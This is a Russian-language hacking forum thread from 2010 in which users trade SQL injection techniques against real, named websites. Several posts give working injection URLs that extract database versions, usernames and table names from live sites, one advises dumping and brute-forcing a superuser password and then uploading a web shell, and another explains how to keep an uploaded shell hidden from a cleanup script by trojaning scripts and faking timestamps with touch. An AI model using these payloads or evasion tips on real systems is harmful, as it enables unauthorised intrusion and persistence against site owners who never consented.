HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.12.2010, 16:12
Bo0oM
Новичок
Регистрация: 26.12.2009
Сообщений: 4
С нами: 8619130

Репутация: 5
По умолчанию

Народ, чем брутить SQl inj вида

1'+and+'1'='1

Вроде есть тулзы для брута через substring()? кинте в лс плиз
 
Ответить с цитированием

  #2  
Старый 29.12.2010, 18:20
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
 
Ответить с цитированием

  #3  
Старый 29.12.2010, 19:15
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от rootmd  
я знаю что там chmod 777 потому-что юзеры могут залить картинки там.
не там, а туда..и не факт что если туда юзвери заливают картинки то там права 777...смотря как права выставленны и для какого юзверя...почитай мануал
 
Ответить с цитированием

  #4  
Старый 29.12.2010, 23:28
rootmd
Участник форума
Регистрация: 09.12.2010
Сообщений: 101
С нами: 8118326

Репутация: -5
По умолчанию

хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?

имеется

1. sql injection, под суперюзером

2. phpmyadmin, нормальный юзер
 
Ответить с цитированием

  #5  
Старый 29.12.2010, 23:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Цитата:
Сообщение от rootmd  
хм....ну я 100% уверен что стойт 777, но если нет, что еще можно сделать?
имеется
1. sql injection, под суперюзером
2. phpmyadmin, нормальный юзер
1.через скуль выведи суперь юзвря пасс, попробуй сбрутить, залей шелл через пыху..

2. попроси в привате знающих людей что бы помогли, а то вынес моск уже со своим рeсурсом 2 день..
 
Ответить с цитированием

  #6  
Старый 30.12.2010, 14:00
~d0s~
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами: 8456812

Репутация: 55
По умолчанию

eclipse

http://www.stigatabletennis.se/pro_objects_details.php?id=1+or+1+group+by+concat( version(),floor(rand(0)*2))having+min(0)+or+1--+

версия как бы намекае
 
Ответить с цитированием

  #7  
Старый 30.12.2010, 14:11
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

http://www.stigatabletennis.se/pro_objects_details.php?id=-1+union+select+1,2,3,4--

Version4.1.22-Max

Uzver u1081176_stiga@pemlinweb03-backnet.crystone.net

DB db1081176_stiga_table_tennis

так что брути таблы...

upd

~d0s~ опередил )
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #8  
Старый 31.12.2010, 01:41
InfectedM
Познающий
Регистрация: 04.11.2007
Сообщений: 51
С нами: 9746190

Репутация: 6
По умолчанию

Что за скрипт умет находить шеллы?

И что можно сделать что бы не детектил..

Заливаю на сайт шелл , на следующий день его нет.

В главном каталоге лежит файлик типа "найденные шеллы" и отдельная папка с бекапами шеллов))
 
Ответить с цитированием

  #9  
Старый 31.12.2010, 01:44
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

админ дебил попался значить ))

протроянь скрипты и не забудь про команду touch =)
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #10  
Старый 31.12.2010, 11:20
qaz
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами: 8334326

Репутация: 75


По умолчанию

очень часто поподаются бд из которых выводится только

CHARACTER_SETS

как быть в таком случае?

http://www.feb.spb.ru/news.php?id=100+union+select+1,table_name,3,4,5,6, 7+from+information_schema.tables--
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.